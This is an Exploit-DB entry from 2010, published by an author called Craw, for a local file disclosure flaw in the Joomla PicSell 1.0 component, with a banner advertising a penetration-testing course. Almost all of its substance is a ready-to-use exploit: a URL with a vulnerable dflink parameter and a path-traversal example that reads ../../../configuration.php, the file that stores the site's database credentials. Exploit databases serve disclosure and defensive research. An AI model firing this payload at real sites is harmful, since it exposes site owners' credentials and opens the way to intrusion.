Joomla! Component PicSell 1.0 - Local File Disclosure

EDB-ID:

14845


Author:

Craw

Type:

webapps


Platform:

PHP

Date:

2010-08-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Author: Craw
# Email: craw@element7.eu             
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications

=======================================================
  
[+] ExploiT :
 
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
 
  
[+] Example :
 
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
 
  
=======================================================
Greetz @ LUXEMBOURG
=======================================================